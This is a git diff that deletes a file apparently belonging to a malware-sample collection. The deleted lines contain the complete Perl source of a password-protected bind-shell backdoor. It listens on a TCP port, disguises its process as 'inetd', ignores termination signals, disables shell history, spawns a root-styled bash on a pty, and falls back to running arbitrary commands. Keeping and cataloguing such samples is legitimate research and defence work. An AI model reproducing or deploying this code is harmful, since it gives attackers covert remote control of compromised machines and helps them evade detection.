diff --git a/Perl/Backdoor.Perl.Termapp.a b/Perl/Backdoor.Perl.Termapp.a deleted file mode 100644 index 92d9fbf4..00000000 --- a/Perl/Backdoor.Perl.Termapp.a +++ /dev/null @@ -1,462 +0,0 @@ -# Telnet-like Standard Daemon 0.7 -# -# 0ldW0lf - oldwolf@atrixteam.net -# - old-wolf@zipmai.com -# - www.atrix.cjb.net -# - www.atrixteam.net -# -# For those guys that still like to open ports -# and use non-rooted boxes -# -# This has been developed to join in the TocToc -# project code, now it's done and I'm distributing -# this separated -# -# This one i made without IO::Pty so it uses -# only standard modules... enjoy it -# -# tested on linux boxes.. probably will work fine on others -# any problem... #atrix@irc.brasnet.org -# - -########################################################## -# ******************* CONFIGURATION ******************** # -########################################################## -my $PORT = $ARGV[0] || 3847; # default port is 3847 -my $PASS = 'ouhEUhhJ6RbwE'; # encripted password -my $SHELL = "/bin/bash"; # shell to be executed -my $HOME = "/tmp"; # your HOME -my $PROC = "inetd"; # name of the process -my $PASS_PROMPT = "Password: "; # password prompt -my $WRONG_PASS = "Password Errata!"; # "wrong password" message -my @STTY = ('sane', 'dec'); # stty arguments -########################################################## - -# feel free to change the ENV -#### ENVironment #### -$ENV{HOME} = $HOME; -#$ENV{PS1} = '[\u@\h \W]: '; # the way i like :) - # colorful PS1 is also funny :) -$ENV{PS1} = '\[\033[3;36m\][\[\033[3;34m\]\[\033[1m\]\u\[\033[3;36m\]@\[\033[0m\]\[\033[3;34m\]\[\033[1m\]\h \[\033[0m\]\[\033[1m\]\W\[\033[0m\]\[\033[3;36m\]]\[\033[0m\]\[\033[1m:\[\033[0m\] '; -$ENV{MAIL} = '/var/mail/root'; -$ENV{PATH} = '/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin'; -$ENV{HISTFILE} = '/dev/null'; -$ENV{USER} = 'root'; -$ENV{LOGNAME} = 'root'; -$ENV{LS_OPTIONS} = ' --color=auto -F -b -T 0'; -$ENV{LS_COLORS} = 'no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.bz2=01;31:*.rpm=01;31:*.deb=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.mpg=01;37:*.avi=01;37:*.mov=01;37:'; -$ENV{SHELL} = $SHELL; -$ENV{TERM} = 'xterm'; -##################### - -$0=$PROC."\0"; - -use IO::Socket; -use IO::Select; -use POSIX; -use strict; - -# i wouldn't change that -# if i were you -###### SIGnals ###### -$SIG{HUP} = 'IGNORE'; -$SIG{PS} = 'IGNORE'; -$SIG{TERM} = 'IGNORE'; -$SIG{CHLD} = sub { wait; }; -##################### - - -# ioctl stuff -my %IOCTLDEF; -$IOCTLDEF{TIOCSWINSZ} = 0x5414; -$IOCTLDEF{TIOCNOTTY} = 0x5422; -$IOCTLDEF{TIOCSCTTY} = 0x540E; -safeload('sys/ttycom.ph', 1); # BSD -safeload('sys/ioctl.ph', 1); -safeload('asm/ioctls.ph', 1); - -foreach my $IOCTL (keys(%IOCTLDEF)) { - next if (defined(&{$IOCTL})); - - if (open(IOD, "< /usr/include/asm/ioctls.h")) { # linux - while() { - if (/^\#define\s+$IOCTL\s+(.*?)\n$/) { - eval "sub $IOCTL () {$1;}"; - last; - } - } - close(IOD); - } - - # i realy dunno if i can do that.. but.. here it goes - eval "sub $IOCTL () { $IOCTLDEF{$IOCTL};}" unless (defined(&{$IOCTL})); -} - - -# starting... -$PORT = $ARGV[0] if ($ARGV[0]); -chdir('/'); - -no strict 'refs'; -my $bindfd = *{'bind_sock'}; -*{$bindfd}= IO::Socket::INET->new(Listen => 1, LocalPort => $PORT, Proto => "tcp") || die "could not listen on port $PORT: $!"; -my $bind = \*{$bindfd}; - -my $pid = fork(); -die "ERROR: I could not fork() the process." unless defined($pid); -exit if $pid; - - -my %CLIENT; -my $sel_serv = IO::Select->new($bind); -my $sel_shell = IO::Select->new(); - - -# main loop... -while ( 1 ) { - select(undef,undef,undef, 0.3) if (scalar(keys(%CLIENT)) == 0); - - read_clients(); - read_shells(); -} - -sub read_clients { - map { read_client($_) } ($sel_serv->can_read(0.01)); -} - -sub read_client { - my $fh = shift; - - if ($fh eq $bind) { - my $newcon = $bind->accept; - $sel_serv->add($newcon); - $CLIENT{$newcon}->{senha} = 0; - $CLIENT{$newcon}->{sock} = $newcon; - $fh->autoflush(1); - do_client($newcon, '3', '5', '1'); - sleep(1); - write_client($newcon, $PASS_PROMPT) if ($PASS_PROMPT); - } else { - my $msg; - my $nread = sysread($fh, $msg, 1024); - - if ($nread == 0) { - close_client($fh); - } else { - telnet_parse($fh, $msg); - } - } -} - -sub read_shells { - map { read_shell($_) } ($sel_shell->can_read(0.01)); -} - -sub telnet_parse { - my ($cli, $msg) = @_; - my $char = (split('', $msg))[0]; - - if (ord($char) == 255) { - chr_parse($cli, $msg); - } else { - if ($CLIENT{$cli}->{senha} == 0) { - $CLIENT{$cli}->{buf} .= $msg; - - return() unless ($msg =~ /\r|\n/); - - my $pass = $CLIENT{$cli}->{buf}; - $CLIENT{$cli}->{buf} = ''; - - $pass =~ s/\n//g; - $pass =~ s/\0//g; - $pass =~ s/\r//g; - - if (crypt($pass, $PASS) ne $PASS) { - finish_client($cli, "\r\n\r".$WRONG_PASS."\r\n\r"); - } else { - $CLIENT{$cli}->{senha} = 1; - write_client($cli, chr(255).chr(253).chr(31)); - write_client($cli, "\r\n\r\r\n\r"); - new_shell($cli); - } - return(); - } - - $msg =~ s/\r\n\0\0//g; - $msg =~ s/\0//g; - $msg =~ s/\r\n/\n/g; - write_shell($cli, $msg); - } -} - -sub read_shell { - my $shell = shift; - my $cli; - map { $cli = $CLIENT{$_}->{sock} if ($CLIENT{$_}->{shell} eq $shell) } keys(%CLIENT); - - my $msg; - my $nread = sysread($shell, $msg, 1024); - - if ($nread == 0) { - finish_client($cli, "Terminal closed.\r\n\r"); - } else { - write_client($cli, $msg); - } -} - -sub to_chr { - my $chrs = ''; - map { $chrs .= chr($_) } (split(/ +/, shift)); - return($chrs); -} - -sub do_client { - my ($client, @codes) = @_; - map { write_client($client, chr(255).chr(251).chr($_)) } @codes; -} - - -sub chr_parse { - my ($client, $chrs) = @_; - - my $ords = ''; - map { $ords .= ord($_).' ' } (split(//, $chrs)); - my $msg = ''; - - - if ($ords =~ /255 250 31 (\d+) (\d+) (\d+) (\d+)/) { - my $winsize = pack('C4', $4, $3, $2, $1); - ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);# || die "erro: $!"; - } - - foreach my $code (split("255 ", $ords)) { - if ($code =~ /(\d+) (.*)$/) { - my $codes = $2; - if ($1 == 251) { - # do whatever you want dude ehehe - $msg .= chr(255).chr(253); - - map { $msg .= chr($_) } (split(/ +/, $codes)); - } - } - } - - write_client($client, $msg) if ($msg); - return(1); -} - -sub new_shell { - my $cli = shift; - - POSIX::setpgid(0, 0); - - my ($tty, $pty); - - unless (($tty, $pty) = open_tty($cli)) { - finish_client($cli, "ERROR: No more pty´s avaliable\n"); - return(undef); - } - - my $pid = fork(); - if (not defined($pid)) { - finish_client($cli, "ERROR: fork()\n"); - return(undef); - } - - unless($pid) { - close($pty); - - local(*DEVTTY); - - if (open (DEVTTY, "/dev/tty")) { - ioctl(DEVTTY, &TIOCNOTTY, 0 );# || die "erro: $!"; - close(DEVTTY); - } - - POSIX::setsid(); - ioctl($tty, &TIOCSCTTY, 0);# || die "erro: $!"; - - open (STDIN, "<&".fileno($tty)) || die "I could not reopen STDIN: $!"; - open (STDOUT, ">&".fileno($tty)) || die "I could not reopen STDOUT: $!"; - open (STDERR, ">&".fileno($tty)) || die "I could not reopen STDERR: $!"; - close($tty); - - sleep(1); - - foreach my $stty ("/bin/stty", "/usr/bin/stty") { - next unless (-x $stty); - map { system("$stty", $_) } @STTY; - } - - chdir("$HOME"); - { exec("$SHELL") }; - - syswrite(STDOUT, "\n\nERROR: exec($SHELL)\n\nI could not execute the shell ($SHELL)\nHowever you are lucky :P\nYou can use the \"I'm FUCKED!\" mode and fix up this thing...\nTip: Find some shell and execute it ;)\n\n"); - syswrite(STDOUT, "\n\nOK! I'm Fucked mode.\n"); - syswrite(STDOUT, "Type ^C to exit\n\nI'm FuCKeD!# "); - - while (my $msg = ) { - $msg =~ s/\n$//; - $msg =~ s/\r$//; - - if ($msg =~ /^\s*cd\s+(\S+)/) { - my $notf = "directory $1 not found!\n"; - chdir($1) || syswrite(STDOUT, $notf, length($notf)); - } else { - system("$msg 2>&1"); - } - syswrite(STDOUT, "I'm FuCKeD!# "); - } - - exit; - } - close($tty); - - select($pty); $| = 1; - select(STDOUT); - - set_raw($pty); - - $CLIENT{$cli}->{shell} = $pty; - $sel_shell->add($pty); - - return(1); -} - - - -# Funciton set_raw() stolen from IO::Pty -sub set_raw($) { - my $self = shift; - return 1 if not POSIX::isatty($self); - my $ttyno = fileno($self); - my $termios = new POSIX::Termios; - unless ($termios) { -# warn "set_raw: new POSIX::Termios failed: $!"; - return undef; - } - unless ($termios->getattr($ttyno)) { -# warn "set_raw: getattr($ttyno) failed: $!"; - return undef; - } - $termios->setiflag(0); - $termios->setoflag(0); - $termios->setlflag(0); - $termios->setcc(&POSIX::VMIN, 1); - $termios->setcc(&POSIX::VTIME, 0); - unless ($termios->setattr($ttyno, &POSIX::TCSANOW)) { -# warn "set_raw: setattr($ttyno) failed: $!"; - return undef; - } - return 1; -} - -sub open_tty { - no strict; - my $cli = shift; - my ($PTY, $TTY) = (*{"pty.$cli"}, *{"tty.$cli"}); # believe me old versions :/ - - - for (my $i = 0; $i < 256; $i++) { - my $pty = get_tty($i, "/dev/pty"); - next unless (open($PTY, "+> $pty")); - - my $tty = get_tty($i, "/dev/tty"); - - unless(open($TTY, "+> $tty")) { - close($PTY); - next; - } - - return($TTY, $PTY); - - } - - return(); -} - -sub get_tty { - my ($num, $base) = @_; - - my @series = ('p' .. 'z', 'a' .. 'e'); - my @subs = ('0' .. '9', 'a' .. 'f'); - - my $buf = $base; - $buf .= @series[($num >> 4) & 0xF]; - $buf .= @subs[$num & 0xF]; - - return($buf); -} - -sub safeload { - my ($module, $require, $arg) = @_; - my $file = $module; - $file =~ s/::/\//g; - - if ($require) { - # all found gonna be loaded - map { eval ("require \"$_/$file\";") if(-f "$_/$file"); } @INC; - } else { - $file .= ".pm" unless ($file =~ /(\.pm|\.ph)$/); - return(eval("use $module $arg;")) if (grep { -f "$_/$file" } @INC); - } - - return(); -} - -sub write_shell { - my ($cli, $msg) = @_; - my $shell = $CLIENT{$cli}->{shell}; - - return(undef) unless ($shell); - - foreach my $m (split_chars($msg, 20)) { - read_shells(); - print $shell $m; - read_shells(); - } - return(1); -} - -sub split_chars { - my ($msg, $nchars) = @_; - - my @splited; - my @chrs = split ('', $msg); - my $done = 0; - while ( 1 ) { - my $splited = join('', @chrs[$done .. ($done+$nchars-1)]); - $done += $nchars; - last if (length($splited) < 1); - push(@splited, $splited); - } - return(@splited); -} - -sub finish_client { - my ($cli, $msg) = @_; - write_client($cli, $msg); - close_client($cli); -} - -sub close_client { - my $cli = shift; - my $sock = $CLIENT{$cli}->{sock}; - - $sel_serv->remove($sock); - if ($CLIENT{$cli}->{shell}) { - my $shell = $CLIENT{$cli}->{shell}; - $sel_shell->remove($shell); - close($shell); - } - $sock->close() if($sock); - delete($CLIENT{$cli}); -} - -sub write_client { - my ($cli, $msg) = @_; - my $sock = $CLIENT{$cli}->{sock}; - syswrite($sock, $msg, length($msg)) if ($sock); -} - -